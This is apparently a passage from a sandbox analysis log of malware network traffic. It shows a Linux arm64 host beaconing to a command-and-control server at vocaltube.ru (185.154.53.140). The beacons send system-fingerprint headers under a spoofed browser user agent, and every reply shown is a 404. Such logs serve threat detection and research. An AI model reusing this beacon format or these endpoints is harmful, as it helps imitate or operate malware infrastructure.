2023-11-29 17:00:08 UTC	548	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome

Session ID	Source IP	Source Port	Destination IP	Destination Port
4	192.168.2.23	52176	185.154.53.140	443

Timestamp	Bytes transferred	Direction	Data
2023-11-29 17:00:10 UTC	431	OUT	GET /mu HTTP/1.1 Host: vocaltube.ru User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36 Arch: arm64 Cores: 2 Id: kEYItBUgmVxsTilBfeqnkdZqlVWoUa Mem: 2992 Os: linux Osname: ubuntu Osversion: 20.04 Referer: http://185.154.53.140/mu Root: true Started: 1701277137 Uuid: 8943ba3c-3f37-46d8-69ce-6633309867a5 Version: 39 Accept-Encoding: gzip
2023-11-29 17:00:11 UTC	143	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 57 65 64 2c 20 32 39 20 4e 6f 76 20 32 30 32 33 20 31 37 3a 30 30 3a 31 30 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 35 34 38 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a Data Ascii: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 29 Nov 2023 17:00:10 GMTContent-Type: text/htmlContent-Length: 548Connection: close
2023-11-29 17:00:11 UTC	548	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome

Session ID	Source IP	Source Port	Destination IP	Destination Port
5	192.168.2.23	52180	185.154.53.140	443

Timestamp	Bytes transferred	Direction	Data
2023-11-29 17:00:13 UTC	433	OUT	GET /l HTTP/1.1 Host: vocaltube.ru User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36 Arch: arm64 Content-Type: application/octet-stream Cores: 2 Mem: 2992 Os: linux Osname: ubuntu Osversion: 20.04 Referer: http://185.154.53.140/l Root: true Started: 1701277137 Uuid: 8943ba3c-3f37-46d8-69ce-6633309867a5 Version: 39 Accept-Encoding: gzip
2023-11-29 17:00:13 UTC	143	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 57 65 64 2c 20 32 39 20 4e 6f 76 20 32 30 32 33 20 31 37 3a 30 30 3a 31 33 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 35 34 38 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a Data Ascii: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 29 Nov 2023 17:00:13 GMTContent-Type: text/htmlContent-Length: 548Connection: close
2023-11-29 17:00:13 UTC	548	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome

Session ID	Source IP	Source Port	Destination IP	Destination Port
6	192.168.2.23	52184	185.154.53.140	443

Timestamp	Bytes transferred	Direction	Data
2023-11-29 17:00:15 UTC	435	OUT	GET /ms HTTP/1.1 Host: vocaltube.ru User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36 Arch: arm64 Content-Type: application/octet-stream Cores: 2 Mem: 2992 Os: linux Osname: ubuntu Osversion: 20.04 Referer: http://185.154.53.140/ms Root: true Started: 1701277137 Uuid: 8943ba3c-3f37-46d8-69ce-6633309867a5 Version: 39 Accept-Encoding: gzip
2023-11-29 17:00:15 UTC	143	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 57 65 64 2c 20 32 39 20 4e 6f 76 20 32 30 32 33 20 31 37 3a 30 30 3a 31 35 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 35 34 38 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a Data Ascii: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 29 Nov 2023 17:00:15 GMTContent-Type: text/htmlContent-Length: 548Connection: close
2023-11-29 17:00:15 UTC	548	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome

Session ID	Source IP	Source Port	Destination IP	Destination Port
7	192.168.2.23	52196	185.154.53.140	443

Timestamp	Bytes transferred	Direction	Data
2023-11-29 17:00:30 UTC	431	OUT	GET /ki HTTP/1.1 Host: vocaltube.ru User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36 Arch: arm64 Cores: 2 Id: PyWRaVRDRnQAcWRRwJdRWSbSFfMtYu Mem: 2992 Os: linux Osname: ubuntu Osversion: 20.04 Referer: http://185.154.53.140/ki Root: true Started: 1701277137 Uuid: 8943ba3c-3f37-46d8-69ce-6633309867a5 Version: 39 Accept-Encoding: gzip
2023-11-29 17:00:30 UTC	143	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 57 65 64 2c 20 32 39 20 4e 6f 76 20 32 30 32 33 20 31 37 3a 30 30 3a 33 30 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 35 34 38 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a Data Ascii: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 29 Nov 2023 17:00:30 GMTContent-Type: text/htmlContent-Length: 548Connection: close
2023-11-29 17:00:30 UTC	548	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome

Session ID	Source IP	Source Port	Destination IP	Destination Port
8	192.168.2.23	52194	185.154.53.140	443

Timestamp	Bytes transferred	Direction	Data
2023-11-29 17:00:30 UTC	433	OUT	GET /get HTTP/1.1 Host: vocaltube.ru User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36 Arch: arm64 Cores: 2 Id: lXgcADDgNTANSlVMuXVSaaNzBRcFOC Mem: 2992 Os: linux Osname: ubuntu Osversion: 20.04 Referer: http://185.154.53.140/get Root: true Started: 1701277137 Uuid: 8943ba3c-3f37-46d8-69ce-6633309867a5 Version: 39 Accept-Encoding: gzip
2023-11-29 17:00:30 UTC	143	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 57 65 64 2c 20 32 39 20 4e 6f 76 20 32 30 32 33 20 31 37 3a 30 30 3a 33 30 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 35 34 38 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a Data Ascii: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 29 Nov 2023 17:00:30 GMTContent-Type: text/htmlContent-Length: 548Connection: close
2023-11-29 17:00:30 UTC	548	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome

Session ID	Source IP	Source Port	Destination IP	Destination Port
9	192.168.2.23	52192	185.154.53.140	443

Timestamp	Bytes transferred	Direction	Data
2023-11-29 17:00:30 UTC	433	OUT	GET /s HTTP/1.1 Host: vocaltube.ru User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36 Arch: arm64 Content-Type: application/octet-stream Cores: 2 Mem: 2992 Os: linux Osname: ubuntu Osversion: 20.04 Referer: http://185.154.53.140/s Root: true Started: 1701277137 Uuid: 8943ba3c-3f37-46d8-69ce-6633309867a5 Version: 39 Accept-Encoding: gzip
2023-11-29 17:00:30 UTC	143	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 57 65 64 2c 20 32 39 20 4e 6f 76 20 32 30 32 33 20 31 37 3a 30 30 3a 33 30 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 35 34 38 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a Data Ascii: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 29 Nov 2023 17:00:30 GMTContent-Type: text/htmlContent-Length: 548Connection: close
2023-11-29 17:00:30 UTC	548	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome

Session ID	Source IP	Source Port	Destination IP	Destination Port
10	192.168.2.23	52204	185.154.53.140	443

Timestamp	Bytes transferred	Direction	Data
2023-11-29 17:00:32 UTC	433	OUT	GET /l HTTP/1.1 Host: vocaltube.ru User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36 Arch: arm64 Content-Type: application/octet-stream Cores: 2 Mem: 2992 Os: linux Osname: ubuntu Osversion: 20.04 Referer: http://185.154.53.140/l Root: true Started: 1701277137 Uuid: 8943ba3c-3f37-46d8-69ce-6633309867a5 Version: 39 Accept-Encoding: gzip
2023-11-29 17:00:32 UTC	143	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 57 65 64 2c 20 32 39 20 4e 6f 76 20 32 30 32 33 20 31 37 3a 30 30 3a 33 32 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 35 34 38 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a Data Ascii: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 29 Nov 2023 17:00:32 GMTContent-Type: text/htmlContent-Length: 548Connection: close
2023-11-29 17:00:32 UTC	548	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome

Session ID	Source IP	Source Port	Destination IP	Destination Port
11	192.168.2.23	52202	185.154.53.140	443

Timestamp	Bytes transferred	Direction	Data
2023-11-29 17:00:32 UTC	433	OUT	GET /l HTTP/1.1 Host: vocaltube.ru User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36 Arch: arm64 Content-Type: application/octet-stream Cores: 2 Mem: 2992 Os: linux Osname: ubuntu Osversion: 20.04 Referer: http://185.154.53.140/l Root: true Started: 1701277137 Uuid: 8943ba3c-3f37-46d8-69ce-6633309867a5 Version: 39 Accept-Encoding: gzip
2023-11-29 17:00:32 UTC	143	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 57 65 64 2c 20 32 39 20 4e 6f 76 20 32 30 32 33 20 31 37 3a 30 30 3a 33 32 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 35 34 38 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a Data Ascii: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 29 Nov 2023 17:00:32 GMTContent-Type: text/htmlContent-Length: 548Connection: close
2023-11-29 17:00:32 UTC	548	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome

Session ID	Source IP	Source Port	Destination IP	Destination Port
12	192.168.2.23	52208	185.154.53.140	443

Timestamp	Bytes transferred	Direction	Data
2023-11-29 17:00:34 UTC	431	OUT	GET /h2 HTTP/1.1 Host: vocaltube.ru User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36 Arch: arm64 Cores: 2 Id: XkuYcgDAciutzIypiAiuryUVKkvyRo Mem: 2992 Os: linux Osname: ubuntu Osversion: 20.04 Referer: http://185.154.53.140/h2 Root: true Started: 1701277137 Uuid: 8943ba3c-3f37-46d8-69ce-6633309867a5 Version: 39 Accept-Encoding: gzip
2023-11-29 17:00:35 UTC	143	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 57 65 64 2c 20 32 39 20 4e 6f 76 20 32 30 32 33 20 31 37 3a 30 30 3a 33 34 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 35 34 38 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a Data Ascii: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 29 Nov 2023 17:00:34 GMTContent-Type: text/htmlContent-Length: 548Connection: close
2023-11-29 17:00:35 UTC	548	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome

Session ID	Source IP	Source Port	Destination IP	Destination Port
13	192.168.2.23	52214	185.154.53.140	443

Timestamp	Bytes transferred	Direction	Data
2023-11-29 17:00:37 UTC	435	OUT	GET /ms HTTP/1.1 Host: vocaltube.ru User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36 Arch: arm64 Content-Type: application/octet-stream Cores: 2 Mem: 2992 Os: linux Osname: ubuntu Osversion: 20.04 Referer: http://185.154.53.140/ms Root: true Started: 1701277137 Uuid: 8943ba3c-3f37-46d8-69ce-6633309867a5 Version: 39 Accept-Encoding: gzip
